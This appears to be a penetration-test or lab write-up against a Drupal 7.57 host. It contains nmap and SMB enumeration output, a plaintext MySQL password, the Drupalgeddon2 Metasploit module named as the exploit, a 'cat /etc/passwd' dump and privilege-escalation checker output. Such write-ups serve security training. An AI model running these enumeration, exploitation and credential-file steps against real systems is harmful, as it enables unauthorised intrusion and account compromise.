🐉Drupal Site
Drupal Site💥
Drupal Version: Drupal 7.57
IP: 192.168.100.52 ————————————————————————————————
Nmap Scans
Nmap scan report for ip-192-168-100-52.ap-south-1.compute.internal (192.168.100.52)
Host is up (0.00065s latency).
Not shown: 65528 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.5.5-10.3.34-MariaDB-0ubuntu0.20.04.1
3389/tcp open ms-wbt-server xrdp
MAC Address: 02:72:F7:AE:78:D8 (Unknown)
Service Info: Host: IP-192-168-100-52; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelDirectory Busting
Robots.txt
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where not to go on your site,
# you save bandwidth and server resources.
#
# This file will be ignored unless it is at the root of your host:
# Used: <http://example.com/robots.txt>
# Ignored: <http://example.com/site/robots.txt>
#
# For more information about the robots.txt standard, see:
# <http://www.robotstxt.org/robotstxt.html>
User-agent: *
Crawl-delay: 10
# CSS, JS, Images
Allow: /misc/*.css$
Allow: /misc/*.css?
Allow: /misc/*.js$
Allow: /misc/*.js?
Allow: /misc/*.gif
Allow: /misc/*.jpg
Allow: /misc/*.jpeg
Allow: /misc/*.png
Allow: /modules/*.css$
Allow: /modules/*.css?
Allow: /modules/*.js$
Allow: /modules/*.js?
Allow: /modules/*.gif
Allow: /modules/*.jpg
Allow: /modules/*.jpeg
Allow: /modules/*.png
Allow: /profiles/*.css$
Allow: /profiles/*.css?
Allow: /profiles/*.js$
Allow: /profiles/*.js?
Allow: /profiles/*.gif
Allow: /profiles/*.jpg
Allow: /profiles/*.jpeg
Allow: /profiles/*.png
Allow: /themes/*.css$
Allow: /themes/*.css?
Allow: /themes/*.js$
Allow: /themes/*.js?
Allow: /themes/*.gif
Allow: /themes/*.jpg
Allow: /themes/*.jpeg
Allow: /themes/*.png
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /node/add/
Disallow: /search/
Disallow: /user/register/
Disallow: /user/password/
Disallow: /user/login/
Disallow: /user/logout/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=comment/reply/
Disallow: /?q=filter/tips/
Disallow: /?q=node/add/
Disallow: /?q=search/
Disallow: /?q=user/password/
Disallow: /?q=user/register/
Disallow: /?q=user/login/
Disallow: /?q=user/logout/FTP Enumeration.
Anonymous Login: ENABLED!!
Samba Enumeration.
root@kali:~# nmap -p445,139 192.168.100.52 --script=smb-enum-users.nse
Starting Nmap 7.92 ( <https://nmap.org> ) at 2023-03-25 00:00 IST
Nmap scan report for ip-192-168-100-52.ap-south-1.compute.internal (192.168.100.52)
Host is up (0.00020s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 02:72:F7:AE:78:D8 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 0.55 seconds
root@kali:~# enum4linux 192.168.100.52
Starting enum4linux v0.8.9 ( <http://labs.portcullis.co.uk/application/enum4linux/> ) on Sat Mar 25 00:00:55 2023
==========================
| Target Information |
==========================
Target ........... 192.168.100.52
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
======================================================
| Enumerating Workgroup/Domain on 192.168.100.52 |
======================================================
[+] Got domain/workgroup name: WORKGROUP
==============================================
| Nbtstat Information for 192.168.100.52 |
==============================================
Looking up status of 192.168.100.52
IP-192-168-100- <00> - B <ACTIVE> Workstation Service
IP-192-168-100- <03> - B <ACTIVE> Messenger Service
IP-192-168-100- <20> - B <ACTIVE> File Server Service
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
=======================================
| Session Check on 192.168.100.52 |
=======================================
[+] Server 192.168.100.52 allows sessions using username '', password ''
=============================================
| Getting domain SID for 192.168.100.52 |
=============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
========================================
| OS information on 192.168.100.52 |
========================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.100.52 from smbclient:
[+] Got OS info for 192.168.100.52 from srvinfo:
IP-192-168-100-Wk Sv PrQ Unx NT SNT ip-192-168-100-52 server (Samba, Ubuntu)
platform_id : 500
os version : 6.1
server type : 0x809a03
===============================
| Users on 192.168.100.52 |
===============================
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.
Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.
===========================================
| Share Enumeration on 192.168.100.52 |
===========================================
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
shared Disk shared
IPC$ IPC IPC Service (ip-192-168-100-52 server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP
[+] Attempting to map shares on 192.168.100.52
//192.168.100.52/print$ Mapping: DENIED, Listing: N/A
//192.168.100.52/shared Mapping: OK, Listing: OK
//192.168.100.52/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \\*
======================================================
| Password Policy Information for 192.168.100.52 |
======================================================
[+] Attaching to 192.168.100.52 using a NULL share
[+] Trying protocol 139/SMB...
[+] Found domain(s):
[+] IP-192-168-100-52
[+] Builtin
[+] Password Info for Domain: IP-192-168-100-52
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: 37 days 6 hours 21 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: 37 days 6 hours 21 minutes
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
================================
| Groups on 192.168.100.52 |
================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
=========================================================================
| Users on 192.168.100.52 via RID cycling (RIDS: 500-550,1000-1050) |
=========================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-1537581390-1319491092-4135932513
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\\ubuntu (Local User)
S-1-22-1-1001 Unix User\\auditor (Local User)
S-1-22-1-1002 Unix User\\dbadmin (Local User)
[+] Enumerating users using SID S-1-5-21-1537581390-1319491092-4135932513 and logon username '', password ''
S-1-5-21-1537581390-1319491092-4135932513-500 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-501 IP-192-168-100-52\\nobody (Local User)
S-1-5-21-1537581390-1319491092-4135932513-502 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-503 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-504 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-505 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-506 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-507 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-508 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-509 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-510 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-511 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-512 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-513 IP-192-168-100-52\\None (Domain Group)
S-1-5-21-1537581390-1319491092-4135932513-514 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-515 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-516 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-517 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-518 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-519 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-520 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-521 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-522 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-523 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-524 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-525 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-526 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-527 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-528 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-529 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-530 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-531 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-532 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-533 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-534 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-535 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-536 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-537 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-538 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-539 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-540 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-541 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-542 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-543 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-544 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-545 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-546 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-547 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-548 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-549 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-550 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1000 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1001 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1002 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1003 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1004 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1005 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1006 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1007 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1008 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1009 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1010 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1011 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1012 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1013 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1014 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1015 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1016 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1017 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1018 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1019 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1020 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1021 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1022 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1023 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1024 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1025 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1026 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1027 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1028 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1029 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1030 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1031 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1032 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1033 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1034 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1035 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1036 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1037 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1038 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1039 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1040 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1041 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1042 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1043 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1044 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1045 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1046 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1047 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1048 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1049 *unknown*\\*unknown* (8)
S-1-5-21-1537581390-1319491092-4135932513-1050 *unknown*\\*unknown* (8)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\\*unknown* (8)
S-1-5-32-501 *unknown*\\*unknown* (8)
S-1-5-32-502 *unknown*\\*unknown* (8)
S-1-5-32-503 *unknown*\\*unknown* (8)
S-1-5-32-504 *unknown*\\*unknown* (8)
S-1-5-32-505 *unknown*\\*unknown* (8)
S-1-5-32-506 *unknown*\\*unknown* (8)
S-1-5-32-507 *unknown*\\*unknown* (8)
S-1-5-32-508 *unknown*\\*unknown* (8)
S-1-5-32-509 *unknown*\\*unknown* (8)
S-1-5-32-510 *unknown*\\*unknown* (8)
S-1-5-32-511 *unknown*\\*unknown* (8)
S-1-5-32-512 *unknown*\\*unknown* (8)
S-1-5-32-513 *unknown*\\*unknown* (8)
S-1-5-32-514 *unknown*\\*unknown* (8)
S-1-5-32-515 *unknown*\\*unknown* (8)
S-1-5-32-516 *unknown*\\*unknown* (8)
S-1-5-32-517 *unknown*\\*unknown* (8)
S-1-5-32-518 *unknown*\\*unknown* (8)
S-1-5-32-519 *unknown*\\*unknown* (8)
S-1-5-32-520 *unknown*\\*unknown* (8)
S-1-5-32-521 *unknown*\\*unknown* (8)
S-1-5-32-522 *unknown*\\*unknown* (8)
S-1-5-32-523 *unknown*\\*unknown* (8)
S-1-5-32-524 *unknown*\\*unknown* (8)
S-1-5-32-525 *unknown*\\*unknown* (8)
S-1-5-32-526 *unknown*\\*unknown* (8)
S-1-5-32-527 *unknown*\\*unknown* (8)
S-1-5-32-528 *unknown*\\*unknown* (8)
S-1-5-32-529 *unknown*\\*unknown* (8)
S-1-5-32-530 *unknown*\\*unknown* (8)
S-1-5-32-531 *unknown*\\*unknown* (8)
S-1-5-32-532 *unknown*\\*unknown* (8)
S-1-5-32-533 *unknown*\\*unknown* (8)
S-1-5-32-534 *unknown*\\*unknown* (8)
S-1-5-32-535 *unknown*\\*unknown* (8)
S-1-5-32-536 *unknown*\\*unknown* (8)
S-1-5-32-537 *unknown*\\*unknown* (8)
S-1-5-32-538 *unknown*\\*unknown* (8)
S-1-5-32-539 *unknown*\\*unknown* (8)
S-1-5-32-540 *unknown*\\*unknown* (8)
S-1-5-32-541 *unknown*\\*unknown* (8)
S-1-5-32-542 *unknown*\\*unknown* (8)
S-1-5-32-543 *unknown*\\*unknown* (8)
S-1-5-32-544 BUILTIN\\Administrators (Local Group)
S-1-5-32-545 BUILTIN\\Users (Local Group)
S-1-5-32-546 BUILTIN\\Guests (Local Group)
S-1-5-32-547 BUILTIN\\Power Users (Local Group)
S-1-5-32-548 BUILTIN\\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\\*unknown* (8)
S-1-5-32-1001 *unknown*\\*unknown* (8)
S-1-5-32-1002 *unknown*\\*unknown* (8)
S-1-5-32-1003 *unknown*\\*unknown* (8)
S-1-5-32-1004 *unknown*\\*unknown* (8)
S-1-5-32-1005 *unknown*\\*unknown* (8)
S-1-5-32-1006 *unknown*\\*unknown* (8)
S-1-5-32-1007 *unknown*\\*unknown* (8)
S-1-5-32-1008 *unknown*\\*unknown* (8)
S-1-5-32-1009 *unknown*\\*unknown* (8)
S-1-5-32-1010 *unknown*\\*unknown* (8)
S-1-5-32-1011 *unknown*\\*unknown* (8)
S-1-5-32-1012 *unknown*\\*unknown* (8)
S-1-5-32-1013 *unknown*\\*unknown* (8)
S-1-5-32-1014 *unknown*\\*unknown* (8)
S-1-5-32-1015 *unknown*\\*unknown* (8)
S-1-5-32-1016 *unknown*\\*unknown* (8)
S-1-5-32-1017 *unknown*\\*unknown* (8)
S-1-5-32-1018 *unknown*\\*unknown* (8)
S-1-5-32-1019 *unknown*\\*unknown* (8)
S-1-5-32-1020 *unknown*\\*unknown* (8)
S-1-5-32-1021 *unknown*\\*unknown* (8)
S-1-5-32-1022 *unknown*\\*unknown* (8)
S-1-5-32-1023 *unknown*\\*unknown* (8)
S-1-5-32-1024 *unknown*\\*unknown* (8)
S-1-5-32-1025 *unknown*\\*unknown* (8)
S-1-5-32-1026 *unknown*\\*unknown* (8)
S-1-5-32-1027 *unknown*\\*unknown* (8)
S-1-5-32-1028 *unknown*\\*unknown* (8)
S-1-5-32-1029 *unknown*\\*unknown* (8)
S-1-5-32-1030 *unknown*\\*unknown* (8)
S-1-5-32-1031 *unknown*\\*unknown* (8)
S-1-5-32-1032 *unknown*\\*unknown* (8)
S-1-5-32-1033 *unknown*\\*unknown* (8)
S-1-5-32-1034 *unknown*\\*unknown* (8)
S-1-5-32-1035 *unknown*\\*unknown* (8)
S-1-5-32-1036 *unknown*\\*unknown* (8)
S-1-5-32-1037 *unknown*\\*unknown* (8)
S-1-5-32-1038 *unknown*\\*unknown* (8)
S-1-5-32-1039 *unknown*\\*unknown* (8)
S-1-5-32-1040 *unknown*\\*unknown* (8)
S-1-5-32-1041 *unknown*\\*unknown* (8)
S-1-5-32-1042 *unknown*\\*unknown* (8)
S-1-5-32-1043 *unknown*\\*unknown* (8)
S-1-5-32-1044 *unknown*\\*unknown* (8)
S-1-5-32-1045 *unknown*\\*unknown* (8)
S-1-5-32-1046 *unknown*\\*unknown* (8)
S-1-5-32-1047 *unknown*\\*unknown* (8)
S-1-5-32-1048 *unknown*\\*unknown* (8)
S-1-5-32-1049 *unknown*\\*unknown* (8)
S-1-5-32-1050 *unknown*\\*unknown* (8)
===============================================
| Getting printer info for 192.168.100.52 |
===============================================
No printers returned.
enum4linux complete on Sat Mar 25 00:01:19 2023
// sign in as root to get the config file of drupal database.
Above screen shows the username nad password fo rhte mysql database
username drupal
password syntex0421
EXPLOTATION
Metasploit Module name: exploit/unix/webapp/drupal_drupalgeddon2
Privilege Escalation
/etc/passwd File
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
landscape:x:110:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
ec2-instance-connect:x:112:65534::/nonexistent:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
rtkit:x:113:119:RealtimeKit,,,:/proc:/usr/sbin/nologin
xrdp:x:114:122::/run/xrdp:/usr/sbin/nologin
dnsmasq:x:115:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
usbmux:x:116:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
avahi:x:117:123:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
cups-pk-helper:x:118:124:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
pulse:x:119:125:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
geoclue:x:120:127::/var/lib/geoclue:/usr/sbin/nologin
saned:x:121:129::/var/lib/saned:/usr/sbin/nologin
colord:x:122:130:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
sddm:x:123:131:Simple Desktop Display Manager:/var/lib/sddm:/bin/false
gdm:x:124:132:Gnome Display Manager:/var/lib/gdm3:/bin/false
auditor:x:1001:1001::/home/auditor:/bin/bash
dbadmin:x:1002:1002::/home/dbadmin:/bin/bash
mysql:x:125:133:MySQL Server,,,:/nonexistent:/bin/false
ftp:x:126:137:ftp daemon,,,:/srv/ftp:/usr/sbin/nologinUnix-privesc check
www-data@ip-192-168-100-52:/tmp$ ./unix-privesc-check standard
./unix-privesc-check standard
Assuming the OS is: linux
Starting unix-privesc-check v1.4 ( <http://pentestmonkey.net/tools/unix-privesc-check> )
This script checks file permissions and other settings that could allow
local users to escalate privileges.
Use of this script is only permitted on systems which you have been granted
legal permission to perform a security assessment of. Apart from this
condition the GPL v2 applies.
Search the output below for the word 'WARNING'. If you don't see it then
this script didn't find any problems.
############################################
Recording hostname
############################################
ip-192-168-100-52
############################################
Recording uname
############################################
Linux ip-192-168-100-52 5.13.0-1021-aws #23~20.04.2-Ubuntu SMP Thu Mar 31 11:36:15 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
############################################
Recording Interface IP addresses
############################################
br-c9cc91cc3452: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
inet 172.18.0.1 netmask 255.255.0.0 broadcast 172.18.255.255
ether 02:42:44:18:0a:39 txqueuelen 0 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
br-decc664e2ae4: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
inet 172.19.0.1 netmask 255.255.0.0 broadcast 172.19.255.255
ether 02:42:85:d3:f5:86 txqueuelen 0 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
docker0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
inet 172.17.0.1 netmask 255.255.0.0 broadcast 172.17.255.255
ether 02:42:a9:37:0d:1a txqueuelen 0 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 9001
inet 192.168.100.52 netmask 255.255.255.0 broadcast 192.168.100.255
inet6 fe80::72:f7ff:feae:78d8 prefixlen 64 scopeid 0x20<link>
ether 02:72:f7:ae:78:d8 txqueuelen 1000 (Ethernet)
RX packets 156918 bytes 9408356 (9.4 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 160637 bytes 14926218 (14.9 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 4866 bytes 439769 (439.7 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 4866 bytes 439769 (439.7 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
############################################
Checking if external authentication is allowed in /etc/passwd
############################################
No +:... line found in /etc/passwd
############################################
Checking nsswitch.conf for addition authentication methods
############################################
Neither LDAP nor NIS are used for authentication
############################################
Checking for writable config files
############################################
Checking if anyone except root can change /etc/passwd
Checking if anyone except root can change /etc/group
Checking if anyone except root can change /etc/fstab
Checking if anyone except root can change /etc/profile
Checking if anyone except root can change /etc/sudoers
Checking if anyone except root can change /etc/shadow
############################################
Checking if /etc/shadow is readable
############################################
Checking if anyone except root can read file /etc/shadow
############################################
Checking for password hashes in /etc/passwd
############################################
No password hashes found in /etc/passwd
############################################
Checking account settings
############################################
File /etc/shadow isn't readable. Skipping some checks.
############################################
Checking library directories from /etc/ld.so.conf
############################################
############################################
Checking sudo configuration
############################################
File /etc/sudoers not present. Skipping checks.
############################################
Checking permissions on swap file(s)
############################################
############################################
Checking programs run from inittab
############################################
File /etc/inittab not present. Skipping checks.
############################################
Checking postgres trust relationships
############################################
No postgres trusts detected
############################################
Checking permissions on device files for mounted partitions
############################################
############################################
Checking cron job programs aren't writable (/etc/crontab)
############################################
Crontab path is /usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
